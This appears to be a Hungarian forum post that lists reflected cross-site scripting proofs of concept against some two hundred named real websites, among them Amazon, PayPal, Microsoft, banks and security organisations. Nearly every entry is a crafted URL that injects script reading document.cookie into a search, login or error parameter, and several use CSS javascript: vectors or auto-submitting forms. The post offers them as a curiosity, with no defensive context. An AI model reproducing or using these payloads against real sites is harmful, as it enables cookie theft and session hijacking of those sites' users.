XSS gyujtemeny

Ezzen az oldalon talaltam egy kis erdekesseget :P.
about.com
http://search.about.com/fullsearch.htm?terms=">

alert(document.cookie)

activestate.com
http://www.activestate.com/Products/Download/Register.plex?id=TclDevKit…">

alert(document.cookie)

adobe.com
http://busca.adobe.com/search?site=AdobeCom&client=AdobeCom&filter=0&ou…

alert(document.cookie)

altavista.com
http://www.altavista.com/image/detail?oid=0&backurl="">

alert(document.cookie)

amazon.com
http://www.amazon.com/exec/obidos/handle-generic-form/002-1202097-05136…"%20%20style='background-image:url(javascript:alert(document.cookie))'

amd.com
http://www.amd.com/force_404_

alert(document.cookie)

annoyances.org
http://www.annoyances.org/exec/htsearch?config=annoyances&restrict=&exc…">

alert(document.cookie)

aol.com
https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&…";}%20alert(document.cookie);%20if(1){%20a="%20}%20

apache.org
http://cvs.apache.org/viewcvs.cgi/

alert(document.cookie)

http://mail-archives.apache.org/eyebrowse/SearchList?listName=user@">

alert(document.cookie)

http://nagoya.apache.org/jira/secure/BrowseProject.jspa?id=">

alert(document.cookie)

http://wiki.apache.org/james/FrontPage?action=show&redirect=StartSeite?

alert(document.cookie)

http://wiki.apache.org/cocoon/UserPreferences?action=userform&login_ema…

alert(document.cookie)

&login_sendmail=+Email+mit+den+Zugangsdaten+senden+&username=&password=&password2=&email=&css_url=%2Fcocoon-data%2Fstyle%2Fmoinmoin.css&edit_cols=80&edit_rows=20&tz_offset=0&datetime_fmt=&language=&show_emoticons=1&show_page_trail=1&remember_me=1&show_fancy_diff=1&show_fancy_links=1&show_toolbar=1&quicklinks=&subscribed_pages=

apple.com
http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre1.pl?client=www_coll…">

alert(document.cookie)

archive.org
http://www.archive.org/search.php?query=

alert(document.cookie)

arcor.de
http://www.arcor.de/hilfe/neu/index.php?aktion=suchen&suchbegriff=">

alert(document.cookie)

ask.com
http://pictures.ask.com/redir?isimageSearch=true&imagesrc=

alert(document.cookie)

ati.com
http://search.ati.com/nasearch.asp?Query=";alert(document.cookie);//&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New

bahn.de
http://www.bahn.de/bin/pv_query?db=pv&maxresults=10&text=">

alert(document.cookie)

bitdefender.de
http://www.bitdefender.de/bd/site/search.php?query=">-->

alert(document.cookie)

blizzard.com

alert(document.cookie);window.onerror=function(){return true};

f.submit()

blogdex.net
http://blogdex.net/search.asp?q=

alert(document.cookie)

blogger.com
http://help.blogger.com/bin/answer.py?answer=152&topic=">

alert(document.cookie)

bloogz.com
http://www.bloogz.com/search.php?q=

alert(document.cookie)

&found_in=blog&n_ricerca=1&tipo=1&lingua_sel2=EN&lingua_sel=ALL&option_sel=data_ins

ca.com
http://search.ca.com/search/ca/?col=&qp=&qs=&qc=&pw=100%25&ws=0&qm=0&st…">

alert(document.cookie)

ccc.de
http://www.ccc.de/cgi-bin/feedback.pl?author=sz&page=

alert(document.cookie)alert(document.cookie)

chip.de
http://www.chip.de/perl/search2.pl?method=and&format=builtin-long&sort=…"'-->

alert(document.cookie)

ciao.de
http://www.ciao.de/search.php?SearchString=">

alert(document.cookie)

cert.org
http://search.cert.org/query.html?qp=qwertz">

alert(document.cookie)

chillingeffects.org
http://www.chillingeffects.org/search.cgi?search=

alert(document.cookie)

cnn.com
http://search.cnn.com/pages/search/advanced.jsp?QuerySubmit=true&QueryT…"%20style='background-image:url(javascript:alert(document.cookie))'%20

comdirect.de
https://isht.comdirect.de/html/detail/main.html?sSym=CXKC.ETR&sCat=

alert(document.cookie)alert(document.cookie)

csialliance.org
https://www.csialliance.org/aboutus/contactus/contact_form/process?name…

alert(document.cookie)

csu.de
http://www.csu.de/home/Display/disp_Suchergebnis?suche=";alert(document.cookie);//

dell.com
http://search.dell.com/mysavedsearches.aspx?k=&l=en&c=us&SITESERVER|ID=…'

daypop.com
http://www.daypop.com/advanced?q=">

alert(document.cookie)

divx.com
http://forums.divx.com/search.php?f1=qwertz"%20style=background-image:url(javascript:alert(document.cookie))%20x="%20

dooyoo.de
http://search.dooyoo.de/search/products/

doubleclick.com
http://kb.doubleclick.com/display/2/index.asp?searchtype=allwords&searc…">

alert(document.cookie)

download.com
http://www.download.com/3120-20_4-0.html?qt=

alert(document.cookie)

&tg=dl-2001

easycredit.de
https://www.easycredit.de/default.jsp?betrag=">

alert(document.cookie)

ebay.com
http://developer.ebay.com/Devprogram/sign_in.asp?error=1&URL=x">

alert(document.cookie)

etrade.com

alert(document.cookie)

">
f.submit()

evite.com
http://www.evite.com/loginRegForm?redirect=">

alert(document.cookie)

excite.com
http://msxml.excite.com/info.xcite/search/advance.htm?qbool=

alert(document.cookie)

fedex.com
http://www.fedex.com/Search/search.jsp?QueryText=-->

alert(document.cookie)alert(document.cookie)

flexwiki.com
http://flexwiki.com/search.aspx?namespace=FlexWiki&search='%20style='ba…

fool.com
http://www.fool.com/search/query.htm?qt=">

alert(document.cookie)

free-av.de
http://www.free-av.de/cgi-bin/news-r?CONF=

alert(document.cookie)

freshmeat.net
http://freshmeat.net/login/?url=">

alert(document.cookie)

fsf.org
http://directory.fsf.org/search/fsd-search.py?q=

alert(document.cookie)alert(document.cookie)

gamestar.de
http://www.gamestar.de/force_404_">

alert(document.cookie)

gm.com
http://www.gm.com/Scripts/SearchServer.exe?method=mainQuery&query=">

alert(document.cookie)

gmx.net
http://www.gmx.net/de/?search=&topic=aaa&type=1

gnu.org
http://savannah.gnu.org/search/?words=">

alert(document.cookie)

https://savannah.gnu.org//account/login.php?form_loginname=x">

alert(document.cookie)

go.com
http://www.go.com/?Zip=";alert(document.cookie)//

golem.de
http://forum.golem.de/phorum/read.php?f=5&i=2647&t=">

alert(document.cookie)

google.com
http://groups-beta.google.com/groups?selm=x

alert(document.cookie)

groupee.com
http://www.groupee.com/gp_request.jsp?SITE_OID=&AUTO_LOGIN=N&ACTION=LOG…;

alert(document.cookie)

gruene-partei.de
http://www.gruene-partei.de/cms/default/dok/20/20447.htm?postback=1&Rub…">

alert(document.cookie)

guenstiger.de
http://www.guenstiger.de/gt/main.asp?okid=0&suche=";alert(document.cookie);//

heise.de
http://www.heise.de/security/foren/go.shtml?list=1&forum_id=44156&">

alert(document.cookie)

hosting.com
http://www.hosting.com/search/search.asp?onwhat=all&ferretthis=">

alert(document.cookie)

hp.com
http://search.hp.com/query.html?hpvc=US+-+English&cc=us&lang=en&qt=\'%2Balert(document.cookie);//&la=en

ibm.com
http://www-132.ibm.com/webapp/wcs/stores/servlet/AddByPartNumber?quanti…"%20style=background-image:url(javascript:alert())%20

icq.com
http://www.icq.com/force_404_"

..

idealo.de
http://www.idealo.de/preisvergleich/MainSearchProductCategory.html?prod…

alert(document.cookie)

&submit.hidden=&prodsearch.form.Area=idealo

imagemagick.org
http://studio.imagemagick.org/Sage/scripts/Sage.cgi?query=">

alert(document.location)

infineon.com
http://www.infineon.com/cgi/ecrm.dll/ecrm/scripts/search/advanced_searc…

alert(document.cookie)

informationsecurityireland.com
http://www.informationsecurityireland.com/index.php?subaction=showfull&…">

alert(document.cookie)

infospace.com
http://ypng.infospace.com/home/yellow-pages/error.htm?vcode=CIT&verror=

alert(document.cookie)

intel.com
http://search2.intel.com/support/default.aspx?q=x&as_q=x&as_epq=x\"%2Balert(document.cookie);%20//

itaa.org
http://www.itaa.org/itserv/whitem.cfm?ID=

alert(document.cookie)

izb.de
https://portal.izb.de/ihb/sparkasse-nuernberg/jsp/ihb/standard_lite_tmp…">

alert(document.cookie)

jamba.de
http://www.jamba.de/dew/sendmail.do?form=kontakt&mobilfunknummer=">

alert(document.cookie)

juno.com
http://search.juno.com/search?action=")){};alert(document.cookie);//

kde.org
http://lists.kde.org/?l=kfm-devel&q=&r=">

alert(document.cookie)

kelkoo.de
http://www.kelkoo.de/search.jsp?siteSearchQuery=qwertz');alert(document…

kerio.com
http://www.kerio.com/search/index.php?query_string='>

alert(document.cookie)

liberale.de
http://www.liberale.de/portal/index.phtml?suche=1&words=">

alert(document.cookie)

linspire.com
http://help.linspire.com/cgi-bin/lindows.cfg/php/enduser/std_alp.php?p_…"%20style="background-image=url(javascript:alert(document.cookie))">

looksmart.com
http://www.looksmart.com/r_search?key=

alert(document.cookie)

lufthansa.com
https://www.lufthansa.com/aerodyn/pr_main.aero?username=">

alert(document.cookie)

lycos.com
http://mail.lycos.com/scripts/lycos/lyproxy.main?login="%20style="background-image:url(javascript:alert(document.cookie))"

macromedia.com
http://www.macromedia.com/cfusion/search/index.cfm?loc=en_us&term=

alert(document.cookie)

mandrakesoft.com
http://www.mandrakesoft.com/force_404_

alert(document.cookie)

mayflower.de
http://www.mayflower.de/content/content2.php?CatID=3&NewsID=28&lang=">

alert(document.cookie)

mcafee.com
http://us.mcafee.com/virusinfo/default.asp?id=alphar&SearchType=2&searc…

alert(document.cookie)

meetup.com
http://www.meetup.com/search/?keywords=

alert(document.cookie)

messagelabs.com
http://www.messagelabs.com/news/detail/default.asp?contentItemId=1245&r…";alert(document.cookie);//

metacrawler.com
http://www.metacrawler.com/info.metac/users/choose.htm?usrop=reguser&va…

alert(document.cookie)

&process=Continue

metadot.com
http://www.metadot.com/metadot/index.pl?filter=x"%20style="background-image:url(javascript:alert(document.cookie))">

microsoft.com
https://s.microsoft.com/germany/eform/default.aspx?ref=">

alert(document.cookie)

mlb.com
http://www.mlb.com/NASApp/mlb/searchGlobalSearchServlet?club=mlb&search…">

alert(document.cookie)

mnogosearch.org
http://www.mnogosearch.org/bugs/index.php?search_for=x">

alert(document.cookie)

modblog.com
http://my.modblog.com/core.mod?show=mbdir&mbs_age_max=">

alert(document.cookie)

modssl.org
http://www.modssl.org/support/majordomo.cgi?action=subscribe&email=

alert(document.cookie)

&list=announce&list=users

mozilla.org
https://bugzilla.mozilla.org/attachment.cgi?id=&action=force_internal_e…

alert(document.cookie)

http://bonsai.mozilla.org/cvsgraph.cgi?file=force_error/

alert(document.cookie)

http://bonsai.mozilla.org/cvsblame.cgi?file=force_error/

mozillazine.org
http://kb.mozillazine.org/index.phtml?title=Special:Userlogin&action=su…">

alert(document.cookie)

msdn.com
http://channel9.msdn.com/Msgs/default.aspx?MessageID=999&ReturnUrl=%2fS…

msn.com
https://help.msn.com/en_us/search/xfind.asp?search=x&INI=PPv25.ini&H_AP…">

window.onerror=function(){return%20true};alert(document.cookie)

msnbc.com
http://www.msnbc.com/news/wea_front.asp?tab=oth&czstr=xxx+style=backgro…

nasa.gov
http://search1.nasa.gov/nasasearch/search/search.jsp?nasaInclude=x"><

nationalgeographic.com
http://google.nationalgeographic.com/search?site=default_collection&cli…

alert(document.cookie)

&proxystylesheet=default_frontend&output=xml_no_dtd&oe=UTF-8&q=a

nba.com
http://www.nba.com/rm/login.jsp?dest=">

alert(document.cookie)

netiq.com
http://www.netiq.com/solutions/webanalytics/default.asp?origin=">

alert(document.cookie)

nfl.com
http://www.nfl.com/login?id=">

alert(document.cookie)

netflix.com
http://www.netflix.com/force_404_

alert(document.cookie)

netscape.com
http://channels.netscape.com/ns/weather/c_select.jsp?pers=y&where=

alert(document.cookie)

nokia.com
http://www.nokia.com/search/help/syntax.jsp?la=en&rq=0&rf=">

alert(document.cookie)

novell.com
http://www.novell.com/de-de/force_404_

alert(document.cookie)

nytimes.com
http://query.nytimes.com/search/query?query=

alert(document.cookie)

onlinekosten.de
http://www.onlinekosten.de/onlinesuche.php?suche=x">

alert(document.cookie)

opencores.org
http://www.opencores.org/search.shtml?config=&method=and&format=long&so…">

alert(document.cookie)

openssl.org
http://www.openssl.org/support/majordomo.cgi?action=subscribe&email=

alert(document.cookie)

&list=announce&list=users

opera.com
http://www.opera.com/search/search.cgi?start=1&end=10&words="%20style%3D"background-image:url(javascript:alert(document.cookie))"%20&x=40&y=10

oracle.com
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?sso…"%20style=background-image:url(javascript:alert(document.cookie))%20x="

paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=--&gt;

alert(document.cookie)

&suche=1

pcpowerplay.de
http://www.pcpowerplay.de/suche/suche_ergebnis.html?words=--&gt;

alert(document.cookie)

pcwelt.de
http://www.pcwelt.de/index.cfm?pid=572&stichwort=

alert(document.cookie)

phpcenter.de
http://www.phpcenter.de/phorum/read.php?f=1&i=45319&t=">

alert(document.cookie)

pmwiki.org
http://www.pmwiki.org/wiki/Main/SearchWiki?pagename=Main%2FSearchWiki&q=

alert(document.cookie)

privacy.org
http://www.privacy.org/-->force_404_

alert(document.cookie)

pro7.de
http://www.pro7.de/service/suche/?q=">

alert(document.cookie)

ptb.de
http://www.ptb.de/cgi-bin/htsearch?config=ptb_DEn&words=x">

alert(document.cookie)

postgresql.org
http://search.postgresql.org/www.search?q=

alert(document.cookie)alert(document.cookie)

reactos.com

alert(document.cookie)

f.submit()

jasonfilby@yahoo.com; brianp@sginet.com

real.com
http://realsearch.real.com/?query=">

alert(document.cookie)

redhat.com
http://www.redhat.com/cgi-bin/search.cgi?q=">

alert(document.cookie)

redvsblue.com
http://www.redvsblue.com/members/signup.php?error=101&email=&user='&gt;

alert(document.cookie)

riaa.com

alert(document.cookie)

">
f.submit()

rtl.de
http://www.rtl.de/websuche.php?kw=">

alert(document.cookie)

ryanair.com
http://www.ryanair.com/fares.html?origin=

alert(document.cookie)

sans.org
http://www.sans.org/search/index.php?q=a&cat=qwertz">

alert(document.cookie)

http://isc.sans.org/add_comment.php?port=25&email=&name=&comment=

alert(document.cookie)

&Preview=Preview

sbroker.de
https://meindepot.sbroker.de/0_start/0_4_login.do?knr=x">

alert(document.cookie)

securityfocus.com
http://ks.securityfocus.com/securityfocus/SearchServlet?col=";alert(document.cookie);//

securityspace.com
https://secure1.securityspace.com/smysecure/trialregister.html?email=">

alert(document.cookie)

shutterfly.com
https://www.shutterfly.com/secure/sign_in.jsp?http=';alert(document.coo…

slashdot.org
http://slashdot.org/search.pl?topic=">

alert(document.cookie)

snocap.com

alert(document.cookie)

f.submit()

sony.com
http://help.station.sony.com/cgi-bin/soe.cfg/php/enduser/std_alp.php?p_…)"><

sourceforge.net
http://sourceforge.net/tracker/?group_id=1&atid=200001&by_submitter=x">

alert(document.cookie)

sparkasse.de

alert(document.cookie)

f.submit()

spd.de
https://www.spd.de/servlet/PB/menu/1030368/index.html?m.surname=">

alert(document.cookie)

spreadfirefox.com

' />

document.getElementById("op").click()

squid-cache.org
http://www.squid-cache.org/cgi-bin/swish-query.cgi?keywords=">

alert(document.cookie)

sqlite.org
http://www.sqlite.org/force_404_

alert(document.cookie)

staysafeonline.com
http://www.staysafeonline.com/cybersafecity/Become-a-Cyber-Safe-City.as…">

alert(document.cookie)

stern.de
http://www.stern.de/tv/about/index.html?id=512593&nv=">

alert(document.cookie)

strato.de
http://www.strato.de/cgi-bin/domaincheck_eingang.pl?domain=

alert(document.cookie)

&&domain_postfix=de

sun.com
http://onesearch.sun.com/search/onesearch/index.jsp?qt=x&col=";

alert(document.cookie)alert(document.cookie)

technorati.com
http://www.technorati.com/cosmos/search.html?rank=&url=qwertz

alert(document.cookie)

telekombusiness.de
http://advent.telekombusiness.de/index.php?user=">

alert(document.cookie)

theonion.com
http://www.theonion.com/search.php?q=">

alert(document.cookie)

tiscali.com
http://investors.tiscali.com/tiscali/DebtInformation/index.jsp?cat=">

alert(document.cookie)

tomshardware.com
http://www17.tomshardware.com/search/search.html?category=all&words=">

alert(document.cookie)

uci.edu
http://weather.uci.edu/cgi-bin/nph-traceroute.cgi?host=

alert(document.cookie)

ups.com
http://wwwapps.ups.com/WebTracking/processInputRequest?HTMLVersion=5.0&…"%0a%0astyle=background-image:url(javascript:alert(document.cookie))%0a%0a"&InquiryNumber2=&InquiryNumber3=&InquiryNumber4=&InquiryNumber5=&AgreeToTermsAndConditions=yes&track.x=41&track.y=10

upside.de
http://www.upside.de/kontakt/?vorname=">

alert(document.cookie)

us-cert.gov
http://search.us-cert.gov/query.html?qp=qwertz">

alert(document.cookie)

validome.org

window.onerror=function(){return true};alert(document.cookie)
f.submit()

varbusiness.com
http://www.varbusiness.com/search/search_results.jhtml?queryText=

alert(document.cookie)

vasoftware.com
http://www.vasoftware.com/search.php?search=x">

alert(document.cookie)

viruslist.com
http://www.viruslist.com/en/find?search_mode=full&words=">

alert(document.cookie)

<

w3.org
http://www.w3.org/Search/Mail/Public/search?type-index=">

alert(document.cookie)

web.de
https://freemail.web.de/msg/logonfailed.htm?--&gt;

alert(document.cookie)
alert(document.cookie);window.onerror=function(){return true};

f.submit()

wsj.com
http://online.wsj.com/public/page/0,,public_home_search,00.html?KEYWORD…">

alert(document.cookie)

xoom.com
https://www.xoom.com/static/help-track.html?err3=1&x=">

alert(document.cookie)

yahoo.com
http://search.yahoo.com/search/images/view?p=%3Cscript%3Ealert(document…

yopi.de

alert(document.cookie)

'>
f.submit()

zonelabs.com
http://vic.zonelabs.com/tmpl/body/CA/virusSearch.jsp?VN=

alert(document.cookie)

Hozzászólások

Érdekes, hogy olyanok is érintettek benne, akikről az ember álmában nem gondolná...
Eléggé elszomorító...

"-Pedig vegetariánus vagyok; csak növényevő állatokat fogyasztok!"
azenoldalamponthu